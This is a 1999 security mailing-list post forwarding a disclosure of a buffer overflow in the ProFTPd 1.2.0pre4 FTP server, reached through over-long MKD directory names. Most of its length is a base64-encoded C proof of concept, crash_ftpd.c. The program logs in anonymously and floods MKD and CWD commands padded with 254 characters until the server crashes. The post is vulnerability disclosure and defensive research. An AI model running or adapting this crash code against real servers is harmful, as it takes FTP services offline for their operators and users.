Date: Sun, 5 Sep 1999 13:45:56 +0200
From: Jan-Philip Velders <[email protected]>
To: [email protected]Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4, supposed to be 'safe' (fwd)
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to [email protected] for more info.
---1463810815-1223308169-936489982=:15281
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <[email protected]>
---------- Forwarded message ----------
Date: Sun, 05 Sep 1999 02:08:29 +0200 (CEST)
From: Renaud Deraison <[email protected]>
To: [email protected]Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4,
supposed to be 'safe'
Resent-Date: Sun, 05 Sep 1999 06:16:54 +0000
Resent-From: [email protected]
Resent-cc: recipient list not shown: ;
Hello,
ProFTPd, a FTP server, has been suffering several security holes lately.
However, the version 1.2.0pre4 is still vulnerable to a mkdir attack,
even though it is supposed to be patched against it.
The trick is to create directories whose name don't exceed 255 chars.
I have not looked at this problem in detail, but I could at least make a
pointer point on a bogus location (85858585) using this method.
Attached to this mail is a C program that will make proftpd crash, but
which won't exploit the vulnerability.
Thank you for your attention,
-- Renaud
--
Renaud Deraison
The Nessus Project
http://www.nessus.org
---1463810815-1223308169-936489982=:15281
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="crash_ftpd.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description: demo code
Content-Disposition: ATTACHMENT; FILENAME="crash_ftpd.c"
I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5j
bHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0K
I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCi8qDQogKiBDcmFzaGVzIFByb0ZU
UGQgMS4yLjBwcmU0IGJlY2F1c2Ugb2YgYSBidWZmZXIgb3ZlcmZsb3cuDQog
Kg0KICoNCiAqIFRoaXMgYnVnIHdhcyBkaXNjb3ZlcmVkIGJ5IHRoZSBOZXNz
dXMgU2VjdXJpdHkgU2Nhbm5lcg0KICoNCiAqIEkgZG9uJ3Qga25vdyBpZiB0
aGlzIGZsYXcgY2FuIGJlIGV4cGxvaXRlZCB0byBnYWluDQogKiByb290IHBy
aXZpbGVnZXMuDQogKg0KICoNCiAqIFRoZSBuYW1lIG9mIHRoZSBjcmVhdGVk
IGRpcmVjdG9yeSBtdXN0IG5vdCBleGNlZWQgMjU1IGNoYXJzICENCiAqDQog
Kg0KICogV3JpdHRlbiBieSBSZW5hdWQgRGVyYWlzb24gPGRlcmFpc29uQGN2
cy5uZXNzdXMub3JnPg0KICoNCiAqLw0KDQovKg0KICogQ2hhbmdlIHRoaXMg
IQ0KICovDQojZGVmaW5lIFRBUkdFVCAiMTkyLjE2OC4xLjUiDQojZGVmaW5l
IFdSSVRFQUJMRV9ESVIgIi9pbmNvbWluZyINCg0KaW50IG1haW4oKQ0Kew0K
IHN0cnVjdCBpbl9hZGRyIHRhcmdldDsNCiBpbnQgc29jOw0KIHN0cnVjdCBz
b2NrYWRkcl9pbiBzYTsNCiANCiBjaGFyICogd3JpdGVhYmxlX2RpciA9ICJD
V0QgIldSSVRFQUJMRV9ESVIiXHJcbiI7DQogY2hhciAqIG1rZDsNCiBjaGFy
ICogY3dkOw0KDQoNCiBpbmV0X2F0b24oVEFSR0VULCAmdGFyZ2V0KTsNCiBt
a2QgPSBtYWxsb2MoMzAwKTsJYnplcm8obWtkLCAzMDApOw0KIGN3ZCA9IG1h
bGxvYygzMDApOwliemVybyhjd2QsIDMwMCk7DQogDQogc29jID0gc29ja2V0
KFBGX0lORVQsIFNPQ0tfU1RSRUFNLDApOw0KIA0KIGJ6ZXJvKCZzYSwgc2l6
ZW9mKHNhKSk7DQogc2Euc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2Euc2lu
X3BvcnQgICA9IGh0b25zKDIxKTsNCiBzYS5zaW5fYWRkci5zX2FkZHIgPSB0
YXJnZXQuc19hZGRyOw0KIGlmKCEoY29ubmVjdChzb2MsIChzdHJ1Y3Qgc29j
a2FkZHIgKikmc2EsIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHJfaW4pKSkpDQog
ew0KICBjaGFyICogYnVmID0gbWFsbG9jKDEwMjQpOw0KICBpbnQgaTsNCiAg
c3ByaW50Zihta2QsICJNS0QgIik7DQogIG1lbXNldChta2QrNCwgJ1gnLCAy
NTQpOw0KICBzcHJpbnRmKG1rZCwgIiVzXHJcbiIsIG1rZCk7DQogIA0KICBz
cHJpbnRmKGN3ZCwgIkNXRCAiKTsNCiAgbWVtc2V0KGN3ZCs0LCAnWCcsIDI1
NCk7DQogIHNwcmludGYoY3dkLCAiJXNcclxuIiwgY3dkKTsNCiAgDQogIHJl
Y3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBzZW5kKHNvYywgIlVTRVIgZnRw
XHJcbiIsIHN0cmxlbigiVVNFUiBmdHBcclxuIiksMCk7DQogIHJlY3Yoc29j
LCBidWYsIDEwMjQsIDApOw0KICBiemVybyhidWYsMTAyNCk7DQogIHNlbmQo
c29jLCAiUEFTUyBwYXNzQFxyXG4iLCBzdHJsZW4oIlBBU1MgcGFzc0Bcclxu
IiksMCk7DQogIHJlY3Yoc29jLCBidWYsIDEwMjQsIDApOw0KICBiemVybyhi
dWYsMTAyNCk7DQogIHNlbmQoc29jLCB3cml0ZWFibGVfZGlyLCBzdHJsZW4o
d3JpdGVhYmxlX2RpciksIDApOw0KICByZWN2KHNvYywgYnVmLCAxMDI0LCAw
KTsNCiAgYnplcm8oYnVmLDEwMjQpOw0KICANCiAgDQogIGZvcihpPTA7aTw0
MDtpKyspDQogIHsNCiAgIHNlbmQoc29jLCBta2QsIHN0cmxlbihta2QpLCAw
KTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7DQogICBpZighc3RybGVu
KGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1vdGUgRlRQZCBjcmFzaGVk
IChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsNCiAgICBleGl0KDApOw0K
ICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAgIHNlbmQoc29jLCBjd2Qs
IHN0cmxlbihjd2QpLCAwKTsNCiAgIHJlY3Yoc29jLCBidWYsIDEwMjQsMCk7
DQogICBpZighc3RybGVuKGJ1ZikpDQogICB7DQogICAgcHJpbnRmKCJSZW1v
dGUgRlRQZCBjcmFzaGVkIChzZWUgL3Zhci9sb2cvbWVzc2FnZXMpXG4iKTsN
CiAgICBleGl0KDApOw0KICAgfQ0KICAgYnplcm8oYnVmLCAxMDI0KTsNCiAg
fQ0KICBwcmludGYoIllvdSB3ZXJlIG5vdCB2dWxuZXJhYmxlIGFmdGVyIGFs
bC4gU29ycnlcbiIpOw0KICBjbG9zZShzb2MpOw0KIH0NCiBlbHNlIHBlcnJv
cigiY29ubmVjdCAiKTsNCiByZXR1cm4oMCk7DQp9DQogICANCiAgDQo=
---1463810815-1223308169-936489982=:15281--